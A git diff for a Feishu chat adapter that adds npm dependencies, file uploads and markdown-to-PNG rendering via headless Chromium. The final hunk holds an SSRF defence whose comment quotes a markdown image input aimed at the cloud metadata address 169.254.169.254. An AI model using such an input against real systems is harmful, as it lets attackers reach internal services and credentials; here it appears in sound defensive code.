+      "license": "ISC",
+      "engines": {
+        "node": ">=12"
+      }
+    },
+    "node_modules/markdown-it": {
+      "version": "14.2.0",
+      "resolved": "https://registry.npmjs.org/markdown-it/-/markdown-it-14.2.0.tgz",
+      "integrity": "sha512-1TGiQiJVRQ3NPmZH6sx5Cfnmg6GQm9jvC1ch4TK511NjSJvjzKLzn5pPfZRNZkRPZP0HqCioSndqH8v2nRaWVQ==",
+      "funding": [
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/puzrin"
+        },
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/markdown-it"
+        }
+      ],
+      "license": "MIT",
+      "dependencies": {
+        "argparse": "^2.0.1",
+        "entities": "^4.4.0",
+        "linkify-it": "^5.0.1",
+        "mdurl": "^2.0.0",
+        "punycode.js": "^2.3.1",
+        "uc.micro": "^2.1.0"
+      },
+      "bin": {
+        "markdown-it": "bin/markdown-it.mjs"
+      }
     },
     "node_modules/math-intrinsics": {
       "version": "1.1.0",
@@ -2103,6 +2614,12 @@
       "resolved": "https://registry.npmjs.org/is-buffer/-/is-buffer-1.1.6.tgz",
       "integrity": "sha512-NcdALwpXkTm5Zvvbk7owOUSvVvBKDgKP5/ewfXEznmQFfs4ZRmanOeKBTjRVjka3QFoN6XJ+9F3USqfHqTaU5w==",
       "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/mdurl": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/mdurl/-/mdurl-2.0.0.tgz",
+      "integrity": "sha512-Lf+9+2r+Tdp5wXDXC4PcIBjTDtq4UKjCPMQhKIuzpJNW0b96kVqSwW0bT7FhRSfmAiFYgP+SCRvdrDozfh0U5w==",
       "license": "MIT"
     },
     "node_modules/media-typer": {
@@ -2168,11 +2685,16 @@
         "node": "*"
       }
     },
+    "node_modules/mitt": {
+      "version": "3.0.1",
+      "resolved": "https://registry.npmjs.org/mitt/-/mitt-3.0.1.tgz",
+      "integrity": "sha512-vKivATfr97l2/QBCYAkXYDbrIWPM2IIKEl7YPhjCvKlG3kE2gm+uBo6nEXK3M5/Ffh/FLpKExzOQ3JJoJGFKBw==",
+      "license": "MIT"
+    },
     "node_modules/ms": {
       "version": "2.1.3",
       "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz",
       "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==",
-      "dev": true,
       "license": "MIT"
     },
     "node_modules/multimatch": {
@@ -2212,6 +2734,15 @@
       "license": "MIT",
       "engines": {
         "node": ">= 0.6"
+      }
+    },
+    "node_modules/netmask": {
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/netmask/-/netmask-2.1.1.tgz",
+      "integrity": "sha512-eonl3sLUha+S1GzTPxychyhnUzKyeQkZ7jLjKrBagJgPla13F+uQ71HgpFefyHgqrjEbCPkDArxYsjY8/+gLKA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">= 0.4.0"
       }
     },
     "node_modules/node-addon-api": {
@@ -2319,7 +2850,6 @@
       "version": "1.4.0",
       "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz",
       "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==",
-      "dev": true,
       "license": "ISC",
       "dependencies": {
         "wrappy": "1"
@@ -2341,6 +2871,38 @@
       },
       "engines": {
         "node": ">= 0.8.0"
+      }
+    },
+    "node_modules/pac-proxy-agent": {
+      "version": "7.2.0",
+      "resolved": "https://registry.npmjs.org/pac-proxy-agent/-/pac-proxy-agent-7.2.0.tgz",
+      "integrity": "sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA==",
+      "license": "MIT",
+      "dependencies": {
+        "@tootallnate/quickjs-emscripten": "^0.23.0",
+        "agent-base": "^7.1.2",
+        "debug": "^4.3.4",
+        "get-uri": "^6.0.1",
+        "http-proxy-agent": "^7.0.0",
+        "https-proxy-agent": "^7.0.6",
+        "pac-resolver": "^7.0.1",
+        "socks-proxy-agent": "^8.0.5"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
+    "node_modules/pac-resolver": {
+      "version": "7.0.1",
+      "resolved": "https://registry.npmjs.org/pac-resolver/-/pac-resolver-7.0.1.tgz",
+      "integrity": "sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg==",
+      "license": "MIT",
+      "dependencies": {
+        "degenerator": "^5.0.0",
+        "netmask": "^2.0.2"
+      },
+      "engines": {
+        "node": ">= 14"
       }
     },
     "node_modules/parseurl": {
@@ -2373,6 +2935,12 @@
         "type": "opencollective",
         "url": "https://opencollective.com/express"
       }
+    },
+    "node_modules/pend": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz",
+      "integrity": "sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==",
+      "license": "MIT"
     },
     "node_modules/pkce-challenge": {
       "version": "5.0.1",
@@ -2413,6 +2981,15 @@
         "node": ">= 0.6.0"
       }
     },
+    "node_modules/progress": {
+      "version": "2.0.3",
+      "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz",
+      "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=0.4.0"
+      }
+    },
     "node_modules/protobufjs": {
       "version": "7.6.4",
       "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.6.4.tgz",
@@ -2450,11 +3027,67 @@
         "node": ">= 0.10"
       }
     },
+    "node_modules/proxy-agent": {
+      "version": "6.5.0",
+      "resolved": "https://registry.npmjs.org/proxy-agent/-/proxy-agent-6.5.0.tgz",
+      "integrity": "sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A==",
+      "license": "MIT",
+      "dependencies": {
+        "agent-base": "^7.1.2",
+        "debug": "^4.3.4",
+        "http-proxy-agent": "^7.0.1",
+        "https-proxy-agent": "^7.0.6",
+        "lru-cache": "^7.14.1",
+        "pac-proxy-agent": "^7.1.0",
+        "proxy-from-env": "^1.1.0",
+        "socks-proxy-agent": "^8.0.5"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/proxy-from-env": {
       "version": "1.1.0",
       "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz",
       "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==",
       "license": "MIT"
+    },
+    "node_modules/pump": {
+      "version": "3.0.4",
+      "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.4.tgz",
+      "integrity": "sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA==",
+      "license": "MIT",
+      "dependencies": {
+        "end-of-stream": "^1.1.0",
+        "once": "^1.3.1"
+      }
+    },
+    "node_modules/punycode.js": {
+      "version": "2.3.1",
+      "resolved": "https://registry.npmjs.org/punycode.js/-/punycode.js-2.3.1.tgz",
+      "integrity": "sha512-uxFIHU0YlHYhDQtV4R9J6a52SLx28BCjT+4ieh7IGbgwVJWO+km431c4yRlREUAsAmt/uMjQUyQHNEPf0M39CA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=6"
+      }
+    },
+    "node_modules/puppeteer-core": {
+      "version": "24.43.1",
+      "resolved": "https://registry.npmjs.org/puppeteer-core/-/puppeteer-core-24.43.1.tgz",
+      "integrity": "sha512-T5ScUMAsmhdNbgDR41AGESYeS6V9MSgetkSnVhhW+gXvzC42VesKCn5ld87gAZDJ6vLHL9GkRvY9WtQWSnwFbw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "@puppeteer/browsers": "2.13.2",
+        "chromium-bidi": "14.0.0",
+        "debug": "^4.4.3",
+        "devtools-protocol": "0.0.1608973",
+        "typed-query-selector": "^2.12.2",
+        "webdriver-bidi-protocol": "0.4.1",
+        "ws": "^8.20.0"
+      },
+      "engines": {
+        "node": ">=18"
+      }
     },
     "node_modules/qs": {
       "version": "6.15.2",
@@ -2503,6 +3136,15 @@
       "integrity": "sha512-urBwgfrvVP/eAyXx4hluJivBKzuEbSQs9rKWCrCkbSxNv8mxPcUZKeuoF3Uy4mJl3Lwprp6yy5/39VWigZ4K6Q==",
       "dev": true,
       "license": "Apache-2.0"
+    },
+    "node_modules/require-directory": {
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz",
+      "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=0.10.0"
+      }
     },
     "node_modules/require-from-string": {
       "version": "2.0.2",
@@ -2562,6 +3204,18 @@
     "node_modules/safer-buffer": {
       "version": "2.1.2",
       "license": "MIT"
+    },
+    "node_modules/semver": {
+      "version": "7.8.5",
+      "resolved": "https://registry.npmjs.org/semver/-/semver-7.8.5.tgz",
+      "integrity": "sha512-Y7/KDsb8LjooZpwaqGyulO6DQlksgCncchHGk+sZIY4SBvUocMBEFH5Ur1fI4dV+Jvl0w6cjvucaIi40puRioA==",
+      "license": "ISC",
+      "bin": {
+        "semver": "bin/semver.js"
+      },
+      "engines": {
+        "node": ">=10"
+      }
     },
     "node_modules/send": {
       "version": "1.2.1",
@@ -2742,11 +3396,48 @@
         "url": "https://github.com/sponsors/isaacs"
       }
     },
+    "node_modules/smart-buffer": {
+      "version": "4.2.0",
+      "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz",
+      "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==",
+      "license": "MIT",
+      "engines": {
+        "node": ">= 6.0.0",
+        "npm": ">= 3.0.0"
+      }
+    },
+    "node_modules/socks": {
+      "version": "2.8.9",
+      "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.9.tgz",
+      "integrity": "sha512-LJhUYUvItdQ0LkJTmPeaEObWXAqFyfmP85x0tch/ez9cahmhlBBLbIqDFnvBnUJGagb0JbIQrkBs1wJ+yRYpEw==",
+      "license": "MIT",
+      "dependencies": {
+        "ip-address": "^10.1.1",
+        "smart-buffer": "^4.2.0"
+      },
+      "engines": {
+        "node": ">= 10.0.0",
+        "npm": ">= 3.0.0"
+      }
+    },
+    "node_modules/socks-proxy-agent": {
+      "version": "8.0.5",
+      "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz",
+      "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==",
+      "license": "MIT",
+      "dependencies": {
+        "agent-base": "^7.1.2",
+        "debug": "^4.3.4",
+        "socks": "^2.8.3"
+      },
+      "engines": {
+        "node": ">= 14"
+      }
+    },
     "node_modules/source-map": {
       "version": "0.6.1",
       "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz",
       "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==",
-      "dev": true,
       "license": "BSD-3-Clause",
       "optional": true,
       "engines": {
@@ -2763,12 +3454,37 @@
         "node": ">= 0.8"
       }
     },
+    "node_modules/streamx": {
+      "version": "2.28.0",
+      "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.28.0.tgz",
+      "integrity": "sha512-1Yowhzjf0ivGMrTIkY9hav5TxobO9qIVqUE41fiCGMGgc3CLlf4MY+9AHmZqBWgDTue0fY9zWjYFVyf6Diuobw==",
+      "license": "MIT",
+      "dependencies": {
+        "events-universal": "^1.0.0",
+        "fast-fifo": "^1.3.2",
+        "text-decoder": "^1.1.0"
+      }
+    },
     "node_modules/string-template": {
       "version": "1.0.0",
       "resolved": "https://registry.npmjs.org/string-template/-/string-template-1.0.0.tgz",
       "integrity": "sha512-SLqR3GBUXuoPP5MmYtD7ompvXiG87QjT6lzOszyXjTM86Uu7At7vNnt2xgyTLq5o9T4IxTYFyGxcULqpsmsfdg==",
       "dev": true,
       "license": "MIT"
+    },
+    "node_modules/string-width": {
+      "version": "4.2.3",
+      "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz",
+      "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==",
+      "license": "MIT",
+      "dependencies": {
+        "emoji-regex": "^8.0.0",
+        "is-fullwidth-code-point": "^3.0.0",
+        "strip-ansi": "^6.0.1"
+      },
+      "engines": {
+        "node": ">=8"
+      }
     },
     "node_modules/stringz": {
       "version": "2.1.0",
@@ -2778,6 +3494,18 @@
       "license": "MIT",
       "dependencies": {
         "char-regex": "^1.0.2"
+      }
+    },
+    "node_modules/strip-ansi": {
+      "version": "6.0.1",
+      "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz",
+      "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==",
+      "license": "MIT",
+      "dependencies": {
+        "ansi-regex": "^5.0.1"
+      },
+      "engines": {
+        "node": ">=8"
       }
     },
     "node_modules/supports-color": {
@@ -2791,6 +3519,50 @@
       },
       "engines": {
         "node": ">=8"
+      }
+    },
+    "node_modules/tar-fs": {
+      "version": "3.1.3",
+      "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.3.tgz",
+      "integrity": "sha512-/hU4AXnIdZu+Gvl1pk0oI5f5HxWsCJRtY2aFaJdk9VvyL48DWU6iU5WAIPG+wIi1YvWA6eTJvIviP/tMAZZNwQ==",
+      "license": "MIT",
+      "dependencies": {
+        "pump": "^3.0.0",
+        "tar-stream": "^3.1.5"
+      },
+      "optionalDependencies": {
+        "bare-fs": "^4.0.1",
+        "bare-path": "^3.0.0"
+      }
+    },
+    "node_modules/tar-stream": {
+      "version": "3.2.0",
+      "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.2.0.tgz",
+      "integrity": "sha512-ojzvCvVaNp6aOTFmG7jaRD0meowIAuPc3cMMhSgKiVWws1GyHbGd/xvnyuRKcKlMpt3qvxx6r0hreCNITP9hIg==",
+      "license": "MIT",
+      "dependencies": {
+        "b4a": "^1.6.4",
+        "bare-fs": "^4.5.5",
+        "fast-fifo": "^1.2.0",
+        "streamx": "^2.15.0"
+      }
+    },
+    "node_modules/teex": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/teex/-/teex-1.0.1.tgz",
+      "integrity": "sha512-eYE6iEI62Ni1H8oIa7KlDU6uQBtqr4Eajni3wX7rpfXD8ysFx8z0+dri+KWEPWpBsxXfxu58x/0jvTVT1ekOSg==",
+      "license": "MIT",
+      "dependencies": {
+        "streamx": "^2.12.5"
+      }
+    },
+    "node_modules/text-decoder": {
+      "version": "1.2.7",
+      "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.7.tgz",
+      "integrity": "sha512-vlLytXkeP4xvEq2otHeJfSQIRyWxo/oZGEbXrtEEF9Hnmrdly59sUbzZ/QgyWuLYHctCHxFF4tRQZNQ9k60ExQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "b4a": "^1.6.4"
       }
     },
     "node_modules/throttleit": {
@@ -2820,7 +3592,6 @@
       "version": "2.8.1",
       "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz",
       "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==",
-      "dev": true,
       "license": "0BSD"
     },
     "node_modules/type-check": {
@@ -2851,6 +3622,12 @@
         "node": ">= 0.6"
       }
     },
+    "node_modules/typed-query-selector": {
+      "version": "2.12.2",
+      "resolved": "https://registry.npmjs.org/typed-query-selector/-/typed-query-selector-2.12.2.tgz",
+      "integrity": "sha512-EOPFbyIub4ngnEdqi2yOcNeDLaX/0jcE1JoAXQDDMIthap7FoN795lc/SHfIq2d416VufXpM8z/lD+WRm2gfOQ==",
+      "license": "MIT"
+    },
     "node_modules/typescript": {
       "version": "5.9.3",
       "dev": true,
@@ -2862,6 +3639,12 @@
       "engines": {
         "node": ">=14.17"
       }
+    },
+    "node_modules/uc.micro": {
+      "version": "2.1.0",
+      "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-2.1.0.tgz",
+      "integrity": "sha512-ARDJmphmdvUk6Glw7y9DQ2bFkKBHwQHLi2lsaH6PPmz/Ka9sFOBsBluozhDltWmnv9u/cF6Rt87znRTPV+yp/A==",
+      "license": "MIT"
     },
     "node_modules/undici": {
       "version": "6.24.1",
@@ -2921,6 +3704,12 @@
         "node": ">= 0.8"
       }
     },
+    "node_modules/webdriver-bidi-protocol": {
+      "version": "0.4.1",
+      "resolved": "https://registry.npmjs.org/webdriver-bidi-protocol/-/webdriver-bidi-protocol-0.4.1.tgz",
+      "integrity": "sha512-ARrjNjtWRRs2w4Tk7nqrf2gBI0QXWuOmMCx2hU+1jUt6d00MjMxURrhxhGbrsoiZKJrhTSTzbIrc554iKI10qw==",
+      "license": "Apache-2.0"
+    },
     "node_modules/which": {
       "version": "2.0.2",
       "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz",
@@ -2969,11 +3758,27 @@
         "node": ">=0.10.0"
       }
     },
+    "node_modules/wrap-ansi": {
+      "version": "7.0.0",
+      "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz",
+      "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==",
+      "license": "MIT",
+      "dependencies": {
+        "ansi-styles": "^4.0.0",
+        "string-width": "^4.1.0",
+        "strip-ansi": "^6.0.0"
+      },
+      "engines": {
+        "node": ">=10"
+      },
+      "funding": {
+        "url": "https://github.com/chalk/wrap-ansi?sponsor=1"
+      }
+    },
     "node_modules/wrappy": {
       "version": "1.0.2",
       "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz",
       "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==",
-      "dev": true,
       "license": "ISC"
     },
     "node_modules/ws": {
@@ -2995,6 +3800,52 @@
         "utf-8-validate": {
           "optional": true
         }
+      }
+    },
+    "node_modules/y18n": {
+      "version": "5.0.8",
+      "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz",
+      "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==",
+      "license": "ISC",
+      "engines": {
+        "node": ">=10"
+      }
+    },
+    "node_modules/yargs": {
+      "version": "17.7.3",
+      "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.3.tgz",
+      "integrity": "sha512-GZtjxm/J/4TSxuL3FNYjCmLktBTnIw/rVmKSIyKeYAZpmJB2ig9VauCC5xsa82GNKVKDAqpOn3KVzNt0zmrU0g==",
+      "license": "MIT",
+      "dependencies": {
+        "cliui": "^8.0.1",
+        "escalade": "^3.1.1",
+        "get-caller-file": "^2.0.5",
+        "require-directory": "^2.1.1",
+        "string-width": "^4.2.3",
+        "y18n": "^5.0.5",
+        "yargs-parser": "^21.1.1"
+      },
+      "engines": {
+        "node": ">=12"
+      }
+    },
+    "node_modules/yargs-parser": {
+      "version": "21.1.1",
+      "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz",
+      "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==",
+      "license": "ISC",
+      "engines": {
+        "node": ">=12"
+      }
+    },
+    "node_modules/yauzl": {
+      "version": "2.10.0",
+      "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz",
+      "integrity": "sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==",
+      "license": "MIT",
+      "dependencies": {
+        "buffer-crc32": "~0.2.3",
+        "fd-slicer": "~1.1.0"
       }
     },
     "node_modules/zod": {

--- a/agent-network/package.json
+++ b/agent-network/package.json
@@ -65,10 +65,13 @@
   },
   "dependencies": {
     "@inquirer/prompts": "^8.4.3",
-    "@larksuiteoapi/node-sdk": "^1.42.0"
+    "@larksuiteoapi/node-sdk": "^1.42.0",
+    "markdown-it": "^14.1.0",
+    "puppeteer-core": "^24.10.2"
   },
   "devDependencies": {
     "@modelcontextprotocol/sdk": "^1.12.0",
+    "@types/markdown-it": "^14.1.2",
     "@types/node": "^25.0.0",
     "javascript-obfuscator": "^5.4.1",
     "node-pty": "^1.1.0",

--- a/agent-network/src/im/feishu/adapter.ts
+++ b/agent-network/src/im/feishu/adapter.ts
@@ -31,6 +31,11 @@ import type {
 } from "../types.js";
 import type { FeishuAccessList, FeishuChannelConfig } from "./config.js";
 import { resolveFeishuAccess } from "../access-resolve.js";
+import {
+  renderMarkdownToPng,
+  shouldRenderAsImage,
+  closeBrowser as closeMarkdownBrowser,
+} from "./markdown-image-renderer.js";
 
 type OnEventHandler = (event: NormalizedIMEvent) => Promise<void>;
 
@@ -168,6 +173,8 @@ export class FeishuAdapter implements IMAdapter {
     this.wsClient = null;
     this.client = null;
     this.feishuConfig = null;
+    // Drop the shared chromium for clean shutdown (image-render path).
+    await closeMarkdownBrowser().catch(() => {});
   }
 
   async send(message: NormalizedIMMessage): Promise<{ messageId: string }> {
@@ -175,11 +182,17 @@ export class FeishuAdapter implements IMAdapter {
       throw new Error("FeishuAdapter.send: call init() first");
     }
 
-    // Decide payload — image takes precedence when imagePath is provided
-    // (caller's choice), otherwise text/markdown.
-    let msgType: "text" | "image" | "interactive";
+    // Hybrid render route (Vincent 2026-06-29 lock, 通信龙 3f70044c):
+    //   - explicit imagePath/files → file/image upload paths (existing)
+    //   - markdown with heading/table/long → render PNG, send msg_type:image
+    //   - markdown without heading/table (short bold/list/link) → schema 1.0 card
+    //     `markdown` element (text stays copyable — preview.7 path)
+    //   - plain text → msg_type:text (existing)
+    let msgType: "text" | "image" | "interactive" | "file";
     let content: string;
+
     if (message.imagePath) {
+      // Caller-supplied image path takes precedence over text/markdown.
       const imageKey = await uploadImage(this.client, message.imagePath);
       if (!imageKey) {
         throw new Error(
@@ -188,26 +201,67 @@ export class FeishuAdapter implements IMAdapter {
       }
       msgType = "image";
       content = JSON.stringify({ image_key: imageKey });
+    } else if (
+      message.files &&
+      message.files.length > 0 &&
+      message.files[0]?.path
+    ) {
+      // Caller-supplied file path → upload + send msg_type:file
+      // (Vincent "给用户发文件" use case, 通信龙 3f70044c).
+      const file = message.files[0];
+      if (!file.path) {
+        throw new Error("FeishuAdapter.send: files[0].path required");
+      }
+      const fileKey = await uploadFile(this.client, file.path, file.name);
+      if (!fileKey) {
+        throw new Error(
+          `FeishuAdapter.send: file upload failed for ${file.path}`,
+        );
+      }
+      msgType = "file";
+      content = JSON.stringify({ file_key: fileKey });
     } else {
       const text = message.text ?? message.markdown;
       if (!text) {
         throw new Error(
-          "FeishuAdapter.send: requires text, markdown, or imagePath",
+          "FeishuAdapter.send: requires text, markdown, imagePath, or files",
         );
       }
-      // Markdown auto-render (Vincent 2026-06-29): when reply text contains
-      // markdown syntax (table / heading / fenced code / bold / list / link
-      // / inline code), upgrade to an interactive card with a single
-      // `markdown` element so Feishu renders properly instead of showing
-      // raw `|` and `**` as text. Plain text replies keep the existing
-      // msg_type:"text" path — no behavior change.
-      if (looksLikeMarkdown(text)) {
+
+      if (shouldRenderAsImage(text)) {
+        // Heading / table / long content — Feishu card markdown element
+        // can't render these. Render to PNG via headless chromium and
+        // send through the image API (needs im:resource:upload scope).
+        try {
+          const png = await renderMarkdownToPng(text);
+          const imageKey = await uploadImageBuffer(this.client, png);
+          if (!imageKey) {
+            throw new Error("uploadImageBuffer returned null");
+          }
+          msgType = "image";
+          content = JSON.stringify({ image_key: imageKey });
+        } catch (e: any) {
+          // Fallback to schema 1.0 card if rendering or upload fails —
+          // user still sees the text, just without true table render.
+          process.stderr.write(
+            `[feishu:adapter] markdown-image render failed, falling back to card: ${e?.message ?? e}\n`,
+          );
+          msgType = "interactive";
+          content = JSON.stringify({
+            config: { wide_screen_mode: true },
+            elements: [{ tag: "markdown", content: text }],
+          });
+        }
+      } else if (looksLikeMarkdown(text)) {
+        // Short markdown — keep text copyable via schema 1.0 card
+        // `markdown` element. preview.7 path.
         msgType = "interactive";
         content = JSON.stringify({
           config: { wide_screen_mode: true },
           elements: [{ tag: "markdown", content: text }],
         });
       } else {
+        // Plain text — existing path, no behavior change.
         msgType = "text";
         content = JSON.stringify({ text });
       }
@@ -597,16 +651,86 @@ async function uploadImage(
   try {
     if (!existsSync(imagePath)) return null;
     const buf = readFileSync(imagePath);
+    return uploadImageBuffer(client, buf);
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Upload a raw buffer as an im.image. Used by the markdown-render path
+ * (Vincent 2026-06-29) which produces PNG bytes in memory and never
+ * lands them on disk. Same lark scope (`im:resource:upload`) as the
+ * path-based uploadImage.
+ */
+async function uploadImageBuffer(
+  client: lark.Client,
+  buf: Buffer,
+): Promise<string | null> {
+  try {
     const stream = Readable.from(buf);
     const resp = await client.im.image.create({
       data: {
         image_type: "message",
-        // lark's typing wants a Readable but the runtime accepts any Readable.
         image: stream as unknown as never,
       },
     });
     return resp?.image_key ?? null;
-  } catch {
+  } catch (e: any) {
+    process.stderr.write(
+      `[feishu:adapter] uploadImageBuffer failed: ${e?.message ?? e}\n`,
+    );
+    return null;
+  }
+}
+
+/**
+ * Upload a file from disk via `im.file.create`. Caller chooses the
+ * `file_name` (Feishu shows this in the chat) and we infer the
+ * `file_type` from the filename extension. Returns the lark `file_key`
+ * for use in `msg_type:"file"` send. Same `im:resource:upload` scope.
+ *
+ * Lark accepts file_type enum: `stream` (generic), `doc`, `xls`, `ppt`,
+ * `pdf`, `mp4`, `opus`. Extension-to-type mapping is conservative — when
+ * in doubt, fall back to `stream`.
+ */
+async function uploadFile(
+  client: lark.Client,
+  filePath: string,
+  fileName?: string,
+): Promise<string | null> {
+  try {
+    if (!existsSync(filePath)) return null;
+    const buf = readFileSync(filePath);
+    const stream = Readable.from(buf);
+    const name = fileName || filePath.split("/").pop() || "file";
+    const ext = (name.split(".").pop() || "").toLowerCase();
+    const fileType: "stream" | "doc" | "xls" | "ppt" | "pdf" | "mp4" | "opus" =
+      ext === "pdf"
+        ? "pdf"
+        : ext === "doc" || ext === "docx"
+          ? "doc"
+          : ext === "xls" || ext === "xlsx"
+            ? "xls"
+            : ext === "ppt" || ext === "pptx"
+              ? "ppt"
+              : ext === "mp4"
+                ? "mp4"
+                : ext === "opus"
+                  ? "opus"
+                  : "stream";
+    const resp = await client.im.file.create({
+      data: {
+        file_type: fileType,
+        file_name: name,
+        file: stream as unknown as never,
+      },
+    });
+    return resp?.file_key ?? null;
+  } catch (e: any) {
+    process.stderr.write(
+      `[feishu:adapter] uploadFile failed (${filePath}): ${e?.message ?? e}\n`,
+    );
     return null;
   }
 }

--- a/agent-network/src/im/feishu/markdown-image-renderer.ts
+++ b/agent-network/src/im/feishu/markdown-image-renderer.ts
@@ -98,6 +98,33 @@ const md = new MarkdownIt({
   typographer: false,
 });
 
+// SSRF defense (通信牛 #329 round 1 blocker 1): markdown image syntax
+// `![alt](http://169.254.169.254/...)` would render to `<img src=URL>` and
+// chromium would fetch that URL during the screenshot — turning the
+// renderer into an SSRF / metadata-service beacon. The renderer doesn't
+// need to load ANY external resource (we control the HTML + system fonts
+// only), so:
+//   1. Disable markdown's `image` rule so `![]()` becomes literal text
+//      (no `<img>` tag is ever emitted).
+//   2. (defense-in-depth) puppeteer page.setRequestInterception aborts
+//      every non-`data:` and non-`about:` request before it goes out.
+md.disable("image");
+// Belt-and-braces: even though the `image` rule is disabled, a stray
+// `<img>` from some markdown-it plugin we add later wouldn't fire if
+// the renderer's `image` callback also returns empty. Override the
+// renderer slot to a no-op so any internal call paths produce nothing.
+md.renderer.rules.image = () => "";
